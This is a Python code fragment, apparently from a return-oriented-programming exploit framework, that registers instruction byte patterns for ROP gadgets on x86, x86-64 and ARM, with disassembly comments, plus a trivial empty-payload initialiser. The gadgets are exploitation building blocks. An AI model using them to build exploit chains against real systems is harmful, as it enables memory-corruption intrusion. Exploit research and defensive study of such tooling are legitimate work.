def __init__(self):
    """Register the per-architecture gadget byte patterns this exploit relies on.

    Every ``self.add_gadget(machine, name, slots, pattern)`` call below pairs a
    gadget name with the exact hex encoding of its instructions; the trailing
    comment on each line is the disassembly of that fragment.  ``machine`` is
    an ELF ``e_machine`` name (EM_386, EM_X86_64, EM_ARM).  ``add_gadget``
    itself is defined outside this view, so the meaning of the third argument
    (4, 8, 3, 6 or None) is not visible here -- the author's "requires 6
    useless parameters" note on the x86-64 ``writemem`` suggests it relates to
    the stack slots a gadget consumes; TODO confirm against add_gadget.

    NOTE(review): "writemem" is registered twice for EM_X86_64.  Whether the
    second registration replaces, is appended to, or is ignored after the
    first depends on add_gadget -- verify, since a silent overwrite would drop
    the stack-based variant.  The ARM encodings are written in little-endian
    byte order (see "Assume LE"), so they presumably only match LE targets.
    """
    Exploit.__init__(self)

    # Good for FreeBSD (kept for reference; the Linux encodings below are the
    # ones actually registered)
    # self.add_gadget("EM_386", "writemem", 4,
    #                 " 8b 44 24 08" +  # mov eax,DWORD PTR [esp+0x8]
    #                 " 8b 4c 24 04" +  # mov ecx,DWORD PTR [esp+0x4]
    #                 " 89 01" +        # mov DWORD PTR [ecx],eax
    #                 " c3")            # ret
    # self.add_gadget("EM_386", "cleanup", 3,
    #                 " 83 c4 0c" +     # add esp,0xc
    #                 " c3")            # ret

    # Good for Linux
    self.add_gadget("EM_386", "writemem", 4,
                    " 8b 54 24 08" +  # mov edx,DWORD PTR [esp+0x8]
                    " 8b 44 24 04" +  # mov eax,DWORD PTR [esp+0x4]
                    " 89 10" +        # mov DWORD PTR [eax],edx
                    " c3")            # ret

    # *(*(eax)+ecx) = ebx
    self.add_gadget("EM_386", "deref_write_with_offset", 4,
                    " 58" +           # pop eax
                    " 5b" +           # pop ebx
                    " 59" +           # pop ecx
                    " 8b 00" +        # mov eax,DWORD PTR [eax]
                    " 89 1c 08" +     # mov DWORD PTR [eax+ecx*1],ebx
                    " c3")            # ret

    self.add_gadget("EM_386", "deref_with_offset_and_save", 4,
                    " 58" +           # pop eax
                    " 5b" +           # pop ebx
                    " 59" +           # pop ecx
                    " 8b 00" +        # mov eax,DWORD PTR [eax]
                    " 8b 04 18" +     # mov eax,DWORD PTR [eax+ebx*1]
                    " 89 01" +        # mov DWORD PTR [ecx],eax
                    " c3")            # ret

    self.add_gadget("EM_386", "copy_to_stack", 4,
                    " 5b" +           # pop ebx
                    " 59" +           # pop ecx
                    " 8b 1b" +        # mov ebx,DWORD PTR [ebx]
                    " 89 1c 0c" +     # mov DWORD PTR [esp+ecx*1],ebx
                    " c3")            # ret

    self.add_gadget("EM_386", "cleanup", 4,
                    " 5b" +           # pop ebx
                    " 5e" +           # pop esi
                    " 5f" +           # pop edi
                    " 5d" +           # pop ebp
                    " c3")            # ret

    self.add_gadget("EM_386", "prepare_memcpy", 4,
                    " 58" +           # pop eax
                    " 5e" +           # pop esi
                    " 01 e6" +        # add esi,esp
                    " 89 34 04" +     # mov DWORD PTR [esp+eax*1],esi
                    " c3")            # ret

    self.add_gadget("EM_386", "custom_cleanup", 4,
                    " 5b" +           # pop ebx
                    " 01 dc" +        # add esp,ebx
                    " c3")            # ret

    # This gadget requires 6 useless parameters
    self.add_gadget("EM_X86_64", "writemem", 8,
                    " 48 8b 54 24 10" +  # mov rdx,QWORD PTR [rsp+0x10]
                    " 48 8b 44 24 08" +  # mov rax,QWORD PTR [rsp+0x8]
                    " 48 89 10" +        # mov QWORD PTR [rax],rdx
                    " c3")               # ret

    # Second "writemem" pattern under the same name -- see the class docstring
    # note about how add_gadget treats duplicate names.
    self.add_gadget("EM_X86_64", "writemem", 8,
                    " 48 89 37" +  # mov QWORD PTR [rdi],rsi
                    " c3")         # ret

    self.add_gadget("EM_X86_64", "cleanup", 6,
                    " 5b" +        # pop rbx
                    " 5d" +        # pop rbp
                    " 41 5c" +     # pop r12
                    " 41 5d" +     # pop r13
                    " 41 5e" +     # pop r14
                    " 41 5f" +     # pop r15
                    " c3")         # ret

    # Ends in an indirect call rather than ret, hence no trailing c3.
    self.add_gadget("EM_X86_64", "args", None,
                    " 4c 89 ea" +     # mov rdx,r13
                    " 4c 89 f6" +     # mov rsi,r14
                    " 44 89 ff" +     # mov edi,r15d
                    " 41 ff 14 dc")   # call QWORD PTR [r12+rbx*8]

    self.add_gadget("EM_X86_64", "deref_write_with_offset", None,
                    " 58" +           # pop rax
                    " 5b" +           # pop rbx
                    " 59" +           # pop rcx
                    " 48 8b 00" +     # mov rax,QWORD PTR [rax]
                    " 48 89 1c 08" +  # mov QWORD PTR [rax+rcx*1],rbx
                    " c3")            # ret

    self.add_gadget("EM_X86_64", "deref_with_offset_and_save", None,
                    " 58" +           # pop rax
                    " 5b" +           # pop rbx
                    " 59" +           # pop rcx
                    " 48 8b 00" +     # mov rax,QWORD PTR [rax]
                    " 48 8b 04 18" +  # mov rax,QWORD PTR [rax+rbx*1]
                    " 48 89 01" +     # mov QWORD PTR [rcx],rax
                    " c3")            # ret

    self.add_gadget("EM_X86_64", "copy_to_stack", None,
                    " 5b" +           # pop rbx
                    " 59" +           # pop rcx
                    " 48 8b 1b" +     # mov rbx,QWORD PTR [rbx]
                    " 48 89 1c 0c" +  # mov QWORD PTR [rsp+rcx*1],rbx
                    " c3")            # ret

    self.add_gadget("EM_X86_64", "prepare_memcpy", None,
                    " 5e" +           # pop rsi
                    " 48 01 e6" +     # add rsi,rsp
                    " c3")            # ret

    self.add_gadget("EM_X86_64", "custom_cleanup", None,
                    " 58" +           # pop rax
                    " 48 01 c4" +     # add rsp,rax
                    " c3")            # ret

    self.add_gadget("EM_X86_64", "prepare_easy", None,
                    " 5f" +           # pop rdi
                    " 5e" +           # pop rsi
                    " 5a" +           # pop rdx
                    " c3")            # ret

    # Assume LE
    self.add_gadget("EM_ARM", "writemem", 4,
                    " 00 10 80 e5" +  # str r1, [r0]
                    " 1e ff 2f e1")   # bx lr

    # Better not use this due to a bug in QEMU
    #self.add_gadget("EM_ARM", "prepare_regs", None,
    #                " f8 85 bd e8")   # pop {r3, r4, r5, r6, r7, r8, sl, pc}

    # Conditional (EQ) variant of the pop above; the author's QEMU note is
    # the only stated reason for preferring it.
    self.add_gadget("EM_ARM", "prepare_regs", None,
                    " f8 85 bd 08")   # popeq {r3, r4, r5, r6, r7, r8, sl, pc}

    self.add_gadget("EM_ARM", "setup_args", None,
                    " 07 00 a0 e1" +  # mov r0, r7
                    " 08 10 a0 e1" +  # mov r1, r8
                    " 0a 20 a0 e1" +  # mov r2, sl
                    " 01 40 84 e2" +  # add r4, r4, #1
                    " 33 ff 2f e1" +  # blx r3
                    " 06 00 54 e1" +  # cmp r4, r6
                    " f7 ff ff 1a" +  # bne 8604 <__libc_csu_init+0x38>
                    " f8 85 bd e8")   # pop {r3, r4, r5, r6, r7, r8, sl, pc}

    self.add_gadget("EM_ARM", "just_ret", None,
                    " 1e ff 2f e1")   # bx lr
def __init__(self):
    """Initialise the Exploit base and install a no-op payload builder.

    ``self.empty_exploit`` is a zero-argument callable that returns a fresh,
    empty list on every call.  Base-class initialisation goes through
    ``Exploit.__init__`` explicitly, as the surrounding file does.
    """
    Exploit.__init__(self)

    def _no_payload():
        # A new list per call so callers may mutate the result freely.
        return []

    self.empty_exploit = _no_payload